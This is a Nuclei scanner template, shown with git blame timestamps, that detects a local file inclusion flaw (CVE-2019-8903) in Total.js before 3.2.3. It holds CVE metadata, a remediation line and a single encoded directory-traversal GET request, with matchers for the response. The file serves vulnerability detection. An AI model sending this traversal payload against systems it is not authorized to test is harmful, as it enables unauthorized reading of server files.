nuclei-templates/http/cves/2019/CVE-2019-8903.yaml

45 lines
1.3 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-8903
2020-04-08 07:36:36 +00:00
info:
name: Totaljs <3.2.3 - Local File Inclusion
2020-04-08 07:36:36 +00:00
author: madrobot
severity: high
description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion.
2023-09-06 12:53:28 +00:00
remediation: |
Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability.
reference:
2021-03-30 12:10:17 +00:00
- https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
- https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
- https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
- https://nvd.nist.gov/vuln/detail/CVE-2019-8903
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-8903
cwe-id: CWE-22
2023-08-31 11:46:18 +00:00
epss-score: 0.0192
epss-percentile: 0.87107
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: totaljs
product: total.js
2023-09-06 12:53:28 +00:00
framework: node.js
2023-07-11 19:49:27 +00:00
tags: cve,cve2019,totaljs,lfi
2020-04-08 07:36:36 +00:00
http:
2020-04-08 07:36:36 +00:00
- method: GET
path:
2020-04-08 08:45:44 +00:00
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
2023-07-11 19:49:27 +00:00
matchers-condition: and
2020-04-08 07:36:36 +00:00
matchers:
2020-04-08 11:17:49 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: body
2020-04-08 11:17:49 +00:00
words:
- "apache2.conf"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200